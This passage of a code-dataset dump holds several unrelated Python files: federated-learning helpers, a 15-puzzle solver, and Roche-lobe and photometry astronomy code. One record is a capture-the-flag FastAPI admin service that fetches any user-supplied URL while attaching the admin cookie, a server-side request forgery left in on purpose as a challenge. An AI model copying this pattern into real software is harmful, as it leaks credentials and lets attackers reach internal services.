action))\n","repo_name":"amir17688/google_data_p2","sub_path":"87280_parser.py_C__Users_user_Desktop_data_2_data_google_data_Lujeni_matterllo_matterllo.py","file_name":"87280_parser.py_C__Users_user_Desktop_data_2_data_google_data_Lujeni_matterllo_matterllo.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38131852182","text":"from fastapi import FastAPI, Request, Response\r\nfrom dotenv import load_dotenv\r\nfrom requests import get\r\nimport os\r\n\r\nload_dotenv()\r\nadmin_cookie = os.environ.get(\"ADMIN_COOKIE\", \"FAKE_COOKIE\")\r\n\r\napp = 
FastAPI()\r\n\r\n\r\n@app.get(\"/\")\r\nasync def index(request: Request):\r\n \"\"\"\r\n The base service for admin site\r\n \"\"\"\r\n\r\n # Currently Work in Progress\r\n requested_service = request.query_params.get(\"service\", None)\r\n if requested_service is None:\r\n return {\"message\": \"requested service is not found\"}\r\n\r\n # Filter external parties who are not local\r\n if requested_service == \"admin_page\":\r\n return {\"message\": \"admin page is currently not a requested service\"}\r\n\r\n # Legit admin on localhost\r\n requested_url = request.query_params.get(\"url\", None)\r\n if requested_url is None:\r\n return {\"message\": \"URL is not found\"}\r\n\r\n # Testing the URL with admin\r\n response = get(requested_url, cookies={\"cookie\": admin_cookie})\r\n return Response(response.content, response.status_code)\r\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/GreyCatTheFlag/2023/Quals/web/Microservices/admin_page/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"38638831098","text":"\n# whichever profile module is imported becomes the active configuration\nfrom profiles.default import *\n\n# default may be empty/None\ndefault = 'local'\n\n__cur_env = None\n\n\ndef acvite_profile(profile: str, double: bool=True):\n \"\"\"Set the active profile/branch\"\"\"\n t = env.get(profile)\n if t is None:\n raise Exception(\"environment profile not found\")\n global __cur_env\n __cur_env = {**global_env, **t}\n print('===============================active profile:%s========================================'%(profile))\n if double:\n input()\n\n\ndef set_temp_env(key, value):\n \"\"\"Set a temporary environment variable\"\"\"\n __cur_env[key] = value\n\n\ndef convert_env(key):\n \"\"\"Get an environment variable, initializing the environment if needed\"\"\"\n if __cur_env is None:\n __init_env()\n r=__cur_env[key]\n if r is None:\n raise Exception(\"no matching environment variable found: \"+key)\n return r\n\ndef __init_env():\n if default is not None:\n acvite_profile(default)\n else:\n global __cur_env\n __cur_env = {**global_env}","repo_name":"Jakentop/PyApi","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29294005197","text":"from modules.config_params import *\nfrom modules import dataset_handling as d\n\n\nclass Helpers:\n def __init__(self):\n pass\n\n\n def client_update(self, client_model, optimizer, train_loader, epoch=5):\n \"\"\"\n This function updates/trains client model on client data\n \"\"\"\n client_model.train()\n for e in range(epoch):\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.cuda(), target.cuda()\n optimizer.zero_grad()\n output = client_model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n # if batch_idx % 10 == 0:\n # print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n # epoch, batch_idx * len(data), len(train_loader.dataset),\n # 100. 
* batch_idx / len(train_loader), loss.item()))\n\n return loss.item()\n\n \n def server_aggregate(self, global_model, client_models, client_lens):\n \"\"\"\n This function has aggregation method 'wmean'\n wmean takes the weighted mean of the weights of models\n \"\"\"\n total = sum(client_lens)\n n = len(client_models)\n global_dict = global_model.state_dict()\n for k in global_dict.keys():\n global_dict[k] = torch.stack([client_models[i].state_dict()[k].float()*(n*client_lens[i]/total) for i in range(len(client_models))], 0).mean(0)\n global_model.load_state_dict(global_dict)\n for model in client_models:\n model.load_state_dict(global_model.state_dict())\n\n\n def test(self, global_model, test_loader):\n \"\"\"\n This function tests the global model on test data \n and returns test loss and test accuracy \n \"\"\"\n global_model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.cuda(), target.cuda()\n output = global_model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n acc = correct / len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n return test_loss, acc\n \n def baseline_data(self, num, datsetHandler):\n '''\n Returns baseline data loader to be used on retraining on global server\n Input:\n num : size of baseline data\n Output:\n loader: baseline data loader\n '''\n\n x_train, y_train, x_test, y_test = datsetHandler.get_cifar10()\n x , y = datsetHandler.shuffle_list_data(x_train, y_train)\n\n x, y = x[:num], y[:num]\n transform, _ = datsetHandler.get_default_data_transforms(train=True, verbose=False)\n loader = torch.utils.data.DataLoader(d.CustomImageDataset(x, y, transform), batch_size=16, shuffle=True)\n\n return loader\n \n def client_syn(self, client_model, global_model):\n '''\n This function synchronizes the client model with global model\n '''\n client_model.load_state_dict(global_model.state_dict())\n","repo_name":"pintauroo/distributed_learning","sub_path":"modules/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2002984046","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport json\n\nsavedir=\"uma\"\ntry:\n os.mkdir(savedir)\nexcept FileExistsError:\n pass\n\n# read the JSON file\nwith open('umaDB.json', 'r') as file:\n alldata = json.load(file)\n\nfor umaid in alldata:\n uma=alldata[umaid]\n filename=str(uma[\"gameId\"])+\"-\"+uma[\"name\"]\n print(filename)\n filename=savedir+\"/\"+filename+\".json\"\n with open(filename, 'w' ,encoding=\"utf-8\") as file:\n s=json.dumps(uma,indent=4)\n file.write(s)\n","repo_name":"hzyhhzy/UmaAi","sub_path":"Scripts/export_uma/split_umaDB.py","file_name":"split_umaDB.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"77"} +{"seq_id":"10834146440","text":"# Alec Lahr - ENPM661 Project 1 - 15 Puzzle Problem\r\n\r\nimport numpy as np\r\n\r\n\r\n# ===================== CONVERSION FUNCTIONS ========================\r\ndef matToStr(mat):\r\n # takes in a numpy matrix state and 
returns the string representation\r\n tenList = list(mat.flatten()) # converts matrix to a list of strings\r\n hexString = '' # create empty string\r\n for elem in tenList: # add each element's hex conversion to the string\r\n hexString += hex(elem)[2]\r\n return hexString\r\n \r\n\r\ndef strToMat(strg):\r\n # takes in a state string and returns the state numpy matrix\r\n tempArray = np.array([]) # make empty array\r\n for char in strg: # add the decimal version of each string element to the array, convert to type int\r\n tempArray = np.append(tempArray, int(char, 16)).astype(int)\r\n return np.reshape(tempArray, (4, 4)) # convert the array to a 4x4 matrix then return it\r\n\r\n\r\n# ======================= SEARCH FUNCTIONS ==========================\r\ndef findZero(mat):\r\n # searches the state matrix for the empty space (0)\r\n (j, i) = np.argwhere(mat == 0)[0]\r\n return (i, j) # return the i, j coordinate of 0\r\n\r\n\r\ndef checkIfDuplicate(strg):\r\n # checks if the input matrix is already in nodes, returns bool\r\n for state in nodes: # cycle through all of nodes list\r\n if state[1] == strg: # compare input to state i\r\n return True # return true if match, exit for loop and function\r\n return False # returns false if nothing found in for loop\r\n\r\n\r\ndef getPossibleMoves(i, j, prevMove):\r\n # checks which moves are possible\r\n # returns a list of 4 bools indicating if that direction is okay to move in\r\n # [Up, Down, Left, Right]\r\n directions = [False, False, False, False]\r\n if i > 0 and prevMove != 'R':\r\n directions[2] = True\r\n if i < 3 and prevMove != 'L':\r\n directions[3] = True\r\n if j > 0 and prevMove != 'D':\r\n directions[0] = True\r\n if j < 3 and prevMove != 'U':\r\n directions[1] = True\r\n return directions\r\n\r\n\r\n# ======================= ACTION FUNCTIONS ==========================\r\ndef actionMoveLeft(mat, i, j):\r\n # moves the 0 tile left one\r\n dummyTile = mat[j][i-1] # store the state of the tile to the left of 0\r\n mat[j][i-1] = 0 # overwrite the left tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\ndef actionMoveRight(mat, i, j):\r\n # moves the 0 tile right one\r\n dummyTile = mat[j][i+1] # store the state of the tile to the right of 0\r\n mat[j][i+1] = 0 # overwrite the right tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\ndef actionMoveUp(mat, i, j):\r\n # moves the 0 tile up one\r\n dummyTile = mat[j-1][i] # store the state of the tile to the up of 0\r\n mat[j-1][i] = 0 # overwrite the up tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\ndef actionMoveDown(mat, i, j):\r\n # moves the 0 tile up one\r\n dummyTile = mat[j+1][i] # store the state of the tile to the up of 0\r\n mat[j+1][i] = 0 # overwrite the up tile\r\n mat[j][i] = dummyTile # replace the 0 with the dummy tile\r\n return mat\r\n\r\n\r\n# ============================== MAIN =================================\r\n# define initial state\r\ninitialState = np.array([[1, 6, 2, 3], [9,5, 7, 4], [0, 10, 11, 8] , [13, 14, 15, 12]])\r\ntestCase = 5 # test case number changes output .txt file name\r\n\r\n# define goal state\r\ngoalState = np.array([[1, 2, 3, 4],\r\n [5, 6, 7, 8],\r\n [9, 10, 11, 12],\r\n [13, 14, 15, 0]])\r\ngoalString = matToStr(goalState) # get the string version of the goal matrix\r\n\r\n# create empty nodes array\r\nnodes = [] # each element of the nodes array takes the form: [index of parent, current state string, prev move]\r\n# 
prev move element takes the form: 'U', 'D', 'L', 'R'\r\n\r\n# add the initial state to the nodes array\r\nnodes.append(['Start', matToStr(initialState), 'N/A'])\r\n# first element is the only one to get a str type parent index and 0 prev move elem\r\n\r\n# remember the index of the first and last state in nodes for the previous layer\r\n# so that you know where to start iterating for the next layer\r\n# Example:\r\n# 0\r\n# 1 2\r\n# 3 4 5 6\r\n# 7 8 9 10 11 12 13 14\r\n# by this point, 7 and 14 would be remembered so that the loop knows to start the next layer from 7 to 14\r\nlayerStartIndex = 0\r\nlayerEndIndex = 0\r\n\r\nfailedMessage = ''\r\n\r\n# keep looping until goalState is found\r\ngoalFound = False\r\nlayer = 0\r\nwhile not goalFound:\r\n # loop through each state from the previous layer\r\n layer += 1\r\n # print('Layer', layer)\r\n for n in range(layerStartIndex, layerEndIndex + 1):\r\n currentString = nodes[n][1] # get the current state string\r\n currentMat = strToMat(currentString) # convert string state to matrix state\r\n i, j = findZero(currentMat) # get the location of the 0, store it in i, j\r\n dirs = getPossibleMoves(i, j, nodes[n][2]) # [Up, Down, Left, Right] with bool\r\n \r\n if dirs[0]: # if possible, move up\r\n childState = actionMoveUp(np.copy(currentMat), i, j) # move up and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'U']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n if dirs[1]: # if possible, move down\r\n childState = actionMoveDown(np.copy(currentMat), i, j) # move down and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'D']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n if dirs[2]: # if possible, move left\r\n childState = actionMoveLeft(np.copy(currentMat), i, j) # move left and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'L']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n if dirs[3]: # if possible, move right\r\n childState = actionMoveRight(np.copy(currentMat), i, j) # move right and store new state\r\n childString = matToStr(childState) # get string version of child state\r\n dup = checkIfDuplicate(childString) # check if the new state is a duplicate state\r\n if dup == False:\r\n nodes.append([n, childString, 'R']) # add new state and its parent to nodes list\r\n if np.array_equal(childString, goalString): # check if the child reached the goal\r\n goalFound = True # exit the for loop and stop while loop\r\n break\r\n \r\n # update the start and end indexes for use in the next layer\r\n layerStartIndex = 
layerEndIndex\r\n if n == layerEndIndex:\r\n layerEndIndex = len(nodes)-1\r\n \r\n # stop the program after 1,000,000 nodes searched\r\n if len(nodes) > 1000000:\r\n goalFound = True\r\n print(\"Search Failed\")\r\n break\r\n if len(nodes) > 1000000:\r\n break\r\n \r\n# exited while loop\r\n \r\nindexes = [len(nodes) - 1] # create array to hold indexes. start with last elem in nodes\r\nmoves = [] # create array to hold moves toward solution\r\n\r\n# get indices and moves list of parents of solution\r\nwhile nodes[indexes[-1]][0] != 'Start': # go until you get back to start\r\n moves.append(nodes[indexes[-1]][2]) \r\n indexes.append(nodes[indexes[-1]][0])\r\n\r\n# reverse order of indexes and moves: now it goes from initial to goal\r\nindexes.reverse()\r\nmoves.reverse()\r\n\r\n# write solution to text file titled with initial state\r\nf = open(\"nodePath_TestCase\" + str(testCase),\"w+\") # create .txt file\r\nfor n, i in enumerate(indexes): # loop through list of solution indexes\r\n strg = strToMat(nodes[i][1]) # get the matrix state at a position\r\n strg = np.reshape(strg, (1,16), order='F').tolist()[0] # convert matrix to be columwise then to list\r\n strg = ' '.join([str(elem) for elem in strg]) \r\n # add the info to the .txt file\r\n f.write(strg + '\\r\\n')\r\nprint('New file created: nodePath_TestCase' + str(testCase) + '.txt')\r\nf.close() \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alecLahr/15PuzzleProblem","sub_path":"Project_1.py","file_name":"Project_1.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8603326753","text":"import numpy as np\n# photutils 1.0.1\n\n\n\n\nclass VelSpace():\n def __init__(self,q, K2):\n if q <= 0:\n return(\"ERROR: q = m2/m1 = \" +str(q) + \" <= 0\")\n \n self.q = q\n self.K2 = K2\n \n # =============================================================================\n # Funciones auxilares \n # =============================================================================\n \n def xl1(self): \n \"\"\" Returns the distance of the L1 point from star 1 scaled by the orbital separation.\n Param q mass ratio = m2/m1.\n \"\"\"\n import numpy as np\n q = self.q\n \n \n NMAX = 1000 # Maximun of iteration\n EPS = 1e-12 #\n \n # Coefficients definition:\n mu = q/(1+q)\n \n a1 = -1+mu; a2 = 2-2*mu; a3 = -1+mu; a4 = 1+2*mu; a5 = -2-mu; a6 = 1\n \n d1 = 1*a2; d2 = 2*a3; d3 = 3*a4; d4 = 4*a5; d5 = 5*a6\n \n # Iteration\n n = 0\n xold = 0\n x = 1/(1+ q)\n \n while n < NMAX and np.abs(x-xold) > EPS*np.abs(x):\n xold = x\n f = x*(x*(x*(x*(x*a6+a5)+a4)+a3)+a2)+a1\n df = x*(x*(x*(x*d5+d4)+d3)+d2)+d1\n x -= f/df\n n+=1\n \n if(n == NMAX):\n return(\"Error: exceeded maximum iterations\")\n \n return x\n \n def rpot(self,x,y,z):\n import numpy as np\n q = self.q\n \n \"\"\" Computes the Roche potential at a given point. 
This is for the standard synchronised Roche geometry\n        q mass ratio = M2/M1 \n        x,y,z the point coordinates in units scaled by separation\n        \"\"\"\n        mu = q/(1+q)\n        comp = 1-mu\n        x2y2 = x**2 + y**2\n        z2 = z**2\n        r1sq = x2y2+z2 \n        r1 = np.sqrt(r1sq)\n        r2 = np.sqrt(r1sq + 1 - 2*x)\n        \n        return (-comp/r1-mu/r2-(x2y2+mu*(mu-2*x))/2)\n    \n\n    #==============================================================================\n    # Roche Lobe\n    #==============================================================================\n    \n    def lobe(self,lobe_n, n=100):\n        \"\"\" lobe returns arrays x and y for plotting an equatorial\n        section of the Roche lobe of the secondary star in a binary of mass\n        ratio q = M2/M1. The arrays start and end at the inner Lagrangian\n        point and march around uniformly in azimuth looking from the centre of\n        mass of the primary star. n is the number of points and must be at\n        least 3.\n        Params:\n\n        n number of x and y values\n        \n        \"\"\"\n        \n        import numpy as np\n        \n        xl1 = self.xl1\n        rpot = np.vectorize(self.rpot)\n        \n        \n        if n < 3:\n            return(\"ERROR: n = \" +str(n) + \" < 3\")\n\n        # This constant is used later in the root search: minimum accuracy in returned root\n        FRAC = 1e-6\n        \n        # Compute L1 point and critical potential there.\n        \n        rl1 = xl1()\n        cpot = rpot(rl1,0,0)\n        \n        # Index that selects which of the two lobes is being traced\n        l={}; l[1]=[1,rl1,0]; l[2]=[-1,1-rl1,1]\n        \n        \n        # Now compute Roche lobe in n regular steps of angle looking from centre of Roche lobe (i.e. L1)\n        x=np.zeros(n)\n        y=np.zeros(n)\n        \n        for i in range(n):\n            # L1 point is a special case because derivative becomes zero there. lambda is set so that after i=0, there is a decent starting multiplier.\n            if i ==0 or i==n-1:\n                x[i] = rl1\n                y[i] = 0\n            else:\n                theta = 2*np.pi*i/(n-1)\n                dx = l[lobe_n][0] * np.cos(theta)\n                dy = np.sin(theta)\n                \n                upper = l[lobe_n][1]\n                lower = upper/4\n                \n                steps=101\n                res=1\n                while res > FRAC:\n                    r=np.linspace(lower,upper,steps)\n                    x0 = l[lobe_n][2] + r * dx\n                    y0 = r*dy\n                    rpot0=rpot(x0,y0,0)\n                    res=np.abs(rpot0-cpot).min()\n                    index=np.abs(rpot0-cpot).argmin()\n                    upper=r[index+1]\n                    lower=r[index-1] \n                \n                x[i] = l[lobe_n][2] + r[index]*dx\n                y[i] = r[index] * dy\n        \n        return x,y\n    \n    \n    def vlobe(self,lobe_n, n=100):\n        \"\"\"vlobe computes the secondary's Roche lobe in velocity coordinates: returns arrays vx and vy for plotting an equatorial section\n        of the Roche lobe of the secondary star in a binary of mass ratio q = M2/M1\n        in Doppler coordinates. The arrays start and end at the inner Lagrangian \n        point and march around uniformly in azimuth looking from the centre of \n        mass of the primary star. 
n is the number of points and must be at least 3\"\"\"\n \n q = self.q\n K2 = self.K2\n lobe = self.lobe\n \n # Call lobe2 then transform appropriately\n x,y=lobe(lobe_n,n)\n \n mu = q/(1+q)\n \n tvx = K2*(q+1)*(- y)\n tvy = K2*(q+1)*(x - mu)\n \n return tvx,tvy\n \n \n #==============================================================================\n # Gas stream \n #==============================================================================\n \n def strinit(self):\n \"\"\" strinit sets a particle just inside the L1 point with the correct velocity as given in Lubow and Shu.\n Params:\n q mass ratio = M2/M1\n r start position returned\n v start velocity returned \"\"\"\n import numpy as np\n q = self.q\n \n SMALL = 1.e-5\n rl1 = self.xl1()\n mu = q/(1+q)\n a = (1-mu)/rl1**3+mu/(1-rl1)**3\n lambda1 = np.sqrt(((a-2) + np.sqrt(a*(9*a-8)))/2)\n m1 = (lambda1*lambda1-2*a-1)/2/lambda1\n \n r = np.array([rl1-SMALL,-m1*SMALL,0])\n v = np.array([-lambda1*SMALL,-lambda1*m1*SMALL,0])\n return r, v\n \n \n def vtrans(self, t_type, x, y, vx, vy):\n \"\"\" vtrans computes two velocity transforms, (1) a straight transform from rotating to inertial frame and \n (2) an inertial frame velocity in the disc.\"\"\"\n import numpy as np\n # type: 1 for rotating - > inertial, 2 for position to disc, 3 for rotating.\n # x: x position (units of separation)\n # y: y position (units of separation)\n # vx: x velocity (omega*a = 1 units)\n # vy: y velocity (omega*a = 1 units)\n\n #\n # When translating to inertial, the accretor velocity is added. If you want the velocity relative to this you must add mu = q/(1+q) to tvy before using it.\n q = self.q\n mu = q/(1+q)\n \n if t_type == 1:\n tvx = vx - y\n tvy = vy + x - mu\n elif t_type == 2:\n rad = np.sqrt(x*x + y*y)\n vkep = 1/np.sqrt((1+q)*rad)\n tvx = -vkep*y/rad\n tvy = vkep*x/rad-mu\n elif t_type == 3:\n tvx = vx\n tvy = vy\n else:\n print(\"Error in vtrans: did not recognize type = \" +str(t_type) + \". Only 1, 2, or 3 supported.\");\n \n return tvx, tvy\n \n \n def rocacc(self,rx,ry,rz,vx,vy,vz):\n \"\"\" rocacc calculates and returns the acceleration (in the rotating frame) in a Roche potential of a particle of given position and velocity.\n Params:\n q mass ratio = M2/M1\n r position, scaled in units of separation.\n v velocity, scaled in units of separation. 
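Returns the rotating-frame acceleration as a length-3 numpy array. 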
\"\"\"\n import numpy as np\n q = self.q\n\n f1 = 1/(1+q)\n f2 = f1*q\n yzsq = np.square(ry) + np.square(rz)\n r1sq = np.square(rx) + yzsq\n r2sq = np.square(rx-1) + yzsq\n fm1 = f1/(r1sq*np.sqrt(r1sq))\n fm2 = f2/(r2sq*np.sqrt(r2sq))\n fm3 = fm1+fm2;\n \n tmpx = -fm3*rx + fm2 + 2*vy + rx - f2\n tmpy = -fm3*ry - 2*vx + ry\n tmpz = -fm3*rz\n \n return np.array([tmpx,tmpy,tmpz])\n \n \n def vstream(self,step,n,t_type=1):\n # Vector donse se almacenaran las velocidades calculadas\n import numpy as np\n\n strinit = self.strinit\n rocacc = self.rocacc\n vtrans = self.vtrans\n \n q = self.q\n K2 = self.K2\n \n x = np.zeros(n)\n y = np.zeros(n)\n vx = np.zeros(n)\n vy = np.zeros(n)\n \n \n #==============================================================================\n # 1er punto: L1\n #==============================================================================\n # Posicion de L1 con velocidad inicial 0\n x[0] = self.xl1()\n y[0] = 0\n vx[0] = 0\n vy[0] = 0\n \n # vx[0],vy[0] = vtrans(q,1, x[0], y[0], 0, 0)\n \n #==============================================================================\n # 2do punto dentro de L1 (Lubow and Shu) \n #==============================================================================\n x[1] = strinit()[0][0]\n y[1] = strinit()[0][1] \n vx[1] = strinit()[1][0]\n vy[1] = strinit()[1][1]\n \n #==============================================================================\n # Bucle para calcular la aceleracion en cada paso \n #==============================================================================\n s = np.arange(n-2)+1\n \n for i in s:\n # Aceleracion\n a = rocacc(x[i], y[i], 0, vx[i], vy[i], 0)\n \n # Posiciones\n x[i+1] = x[i]+ vx[i]*step + 0.5*a[0]*np.square(step)\n y[i+1] = y[i]+ vy[i]*step + 0.5*a[1]*np.square(step)\n # Velocidades\n vx[i+1] = vx[i] + a[0]*step\n vy[i+1] = vy[i] + a[1]*step\n \n return K2*(q+1)*np.float_(vtrans(t_type,x,y,vx,vy))\n \n\n\n\n\n\n# =============================================================================\n# Algoritmos de centrado \n# =============================================================================\ndef Centroid(data,coords,size=7,method='1dg',mask=None):\n \"\"\"\n Entrada: imagen, lista de coordenadas. Busca el centroide en una region de radio \"r\" entorno a la posicion dada en \"coords\".\n Salida: array con las posisiones ajustadas y distancia entre las posisiones \"d\"\n\n Parameters\n ----------\n data : TYPE\n DESCRIPTION.\n \n coords : numpy array\n n coordinates in a (n,2) numpy array.\n \n size : number, optional\n Size in pixels of the section containing the start where perform the centroid. 
The default is 3.\n \n method : photutils.centroid\n com: Calculates the object “center of mass” from 2D image moments.\n quadratic: Calculates the centroid by fitting a 2D quadratic polynomial to the data.\n 1dg: Calculates the centroid by fitting 1D Gaussians to the marginal x and y distributions of the data.\n 2dg: Calculates the centroid by fitting a 2D Gaussian to the 2D distribution of the data.\n\n Returns\n -------\n None.\n\n \"\"\" \n \n # =============================================================================\n # Paquetes utilizados \n # =============================================================================\n from photutils.centroids import centroid_com, centroid_quadratic,centroid_1dg, centroid_2dg\n from astropy.nddata.utils import Cutout2D\n from astropy.stats import sigma_clipped_stats\n \n # Diccionario con los distintos metodos de centrados \n cent = {'com': centroid_com, 'quadratic': centroid_quadratic, '1dg': centroid_1dg, '2dg':centroid_2dg}\n \n # Vamos a definir una seccion de los datos\n cut = Cutout2D(data, coords, size=size)\n sec = cut.data\n \n #Calculamos el cielo solo dentro de la dregion selectionada y lo restamos \n median = sigma_clipped_stats(sec, sigma=3.0)[1]\n sec = sec - median\n \n x_s, y_s = cent[method](sec, mask=mask)\n \n fit_coords = cut.to_original_position([x_s, y_s])\n \n \n return fit_coords\n\n# =============================================================================\n# Seleccion manual de coordenadas\n# =============================================================================\ndef InteractiveCentroid(data,n_points, size=7, method='1dg', mask=None, cmap='Greys',p_min=5,p_max=95):\n \"\"\" Definicion\n \"\"\"\n import numpy as np\n import tkinter\n import matplotlib\n matplotlib.use('TKAgg')\n import matplotlib.pyplot as plt\n from tkinter import messagebox #tkinter.TkVersion 8.6 \n\n # limites del contraste \n vmin = np.percentile(data,p_min)\n vmax = np.percentile(data,p_max)\n \n # Equiquetas para las estrellas\n label=['Obj','Comp1','Comp2','Comp3','Comp4','Comp5','Comp6','Comp7','Comp8','Comp9']\n\n \n plt.close('all') \n plt.ion(),plt.show()\n plt.figure(1,figsize=(7,7))\n\n happy = False\n centroid = []\n while happy == False:\n plt.cla()\n plt.title('Select Object first then '+str(n_points-1)+' comparison stars')\n plt.imshow(data,origin='lower',cmap=cmap, aspect='equal',vmin=vmin,vmax=vmax)\n plt.tight_layout()\n plt.show()\n\n\n # Coger puntos de manera interactiva\n point = plt.ginput(n=n_points,timeout=0,show_clicks=True,)\n \n coords = point\n\n # =============================================================================\n # Centrado\n # =============================================================================\n for coord in coords:\n ind = coords.index(coord)\n \n cent = Centroid(data,coord,size=size,method=method,mask=mask)\n centroid.append(cent)\n \n # Posiciones del cursor\n # plt.scatter(coord[0],coord[1],marker='+',color='b',zorder=2,alpha=0.3)\n # Posiciones ajustadas\n plt.scatter(cent[0],cent[1],marker='+',color='C3')\n plt.scatter(cent[0],cent[1], s=80, facecolors='none', edgecolors='C3',zorder=1)\n\n plt.annotate(label[ind],coord, xytext=(8, 8), textcoords='offset points',color='C3',size=15)#, weight='bold')\n\n plt.show()\n\n\n happy = messagebox.askyesno(\"\",\"Are you happpy with the result?\")\n plt.close(1)\n\n \n return coords \n \n\n# =============================================================================\n# Seccion de los datos del tamano de la apertura \n# 
=============================================================================\ndef SecImData(ap, data, method, subpixels=None):\n mask=ap.to_mask(method=method,subpixels=subpixels)\n mask_data=mask.data\n sec=mask.cutout(data)\n sec_weight=sec*mask_data\n sec_data = sec_weight[mask_data>0]\n # Quitamos los valores NaN\n sec_data = sec_data[np.isfinite(sec_data)]\n \n return sec_data\n\n\n\nclass AnnSky:\n \n def __init__(self,data, coord, r_in, r_out, method, subpixels=None):\n from photutils import CircularAnnulus\n\n self.ap = CircularAnnulus(coord, r_in=r_in, r_out=r_out)\n \n self.sec_data = SecImData(self.ap, data, method=method, subpixels=subpixels)\n # media sigma clip\n \n def stat(self, sigma_clip):\n from astropy.stats import sigma_clipped_stats \n mean, median, stddev = sigma_clipped_stats(self.sec_data, sigma=sigma_clip)\n \n return mean, median, stddev\n \n def plot(self, color= 'C0', ls='solid',lw=1):\n self.ap.plot(color=color, ls =ls,lw=lw)\n\n\n\ndef FWHM(data,xc,yc):\n from astropy.modeling.models import Gaussian2D\n from astropy.modeling.models import Moffat2D\n from astropy.modeling.models import Const2D\n from astropy.modeling.models import Polynomial2D\n from astropy.modeling.fitting import LevMarLSQFitter\n\n # Data:\n x, y = np.mgrid[:data.shape[0], :data.shape[1]]\n \n # Model:\n cte0 = 0.06\n Cte = Polynomial2D(degree=1)\n \n # Model:\n cte0 = 0.06\n Cte = Const2D(cte0)\n\n \n Moff = Moffat2D(amplitude=1, x_0=xc, y_0=yc, gamma=20, alpha=2)\n \n \"\"\" \n Gauss = Gaussian2D(amplitude=data[int(yc),int(xc)]/2, x_mean=xc, y_mean=yc,x_stddev=1,y_stddev=1)\n # Parametros fijos\n Gauss.x_mean.fixed = True\n Gauss.y_mean.fixed = True\n Gauss.theta.fixed = True\n model = Gauss + Cte\n\n \"\"\"\n\n model = Moff + Cte\n \"\"\"\n # Parametros ligados: imponemos que sea una gaussiana redonda\n def tie(model):\n return model.y_stddev_0\n \n model.x_stddev_0.tied = tie\n \"\"\"\n \n # Fit\n fitter = LevMarLSQFitter()\n import warnings\n with warnings.catch_warnings():\n # Ignore model linearity warning from the fitter\n warnings.simplefilter('ignore')\n fit = fitter(model, x, y, data)\n gamma = fit.gamma_0\n alpha = fit.alpha_0\n \n FWHM = 2. 
* gamma * np.sqrt(2 ** (1/alpha) -1) #fit.x_stddev_0.value\n \n #FWHM = 2.3548 * sigma\n \n return FWHM, fit\n\n\n\ndef Seeing(data, r = 11):\n \n from astropy.stats import sigma_clipped_stats\n from photutils.detection import DAOStarFinder \n from astropy.nddata.utils import Cutout2D\n\n # Source detection\n\n mean, median, std = sigma_clipped_stats(data, sigma=3) \n\n starfind = DAOStarFinder(fwhm=4.0, threshold=5.*std, exclude_border=True, sky=median) \n sources = starfind(data-median) \n\n x = sources['xcentroid'] \n y = sources['ycentroid']\n \n # FWHM over all the detected sources\n fwhm = []\n for i in range(len(x)): \n cut = Cutout2D(data, [x[i],y[i]], r, mode='partial')\n sec = cut.data\n xc , yc = cut.to_cutout_position([x[i],y[i]])\n fwhm.append(FWHM(sec,xc,yc))\n \n return np.array(fwhm)\n\n\n\"\"\"\n\n # Magnitud fumental\n # Asignamos el mismo zeropoint que iraf\n \n inst_mag = -2.5*np.log10((phot_table['aperture_sum'] - bkg_sum)/exptime[i])\n \n # Errores segun los calcula IRAF\n\n flux = phot_table['aperture_sum'] - bkg_sum # cuentas debidas solo a la senal\n epadu = gain[i] # ganancia\n \n area = aperture.area\n stdev = bkg_std # desviacion estandard del cielo\n nsky = annulus_apertures.area\n error = np.sqrt(flux/epadu + 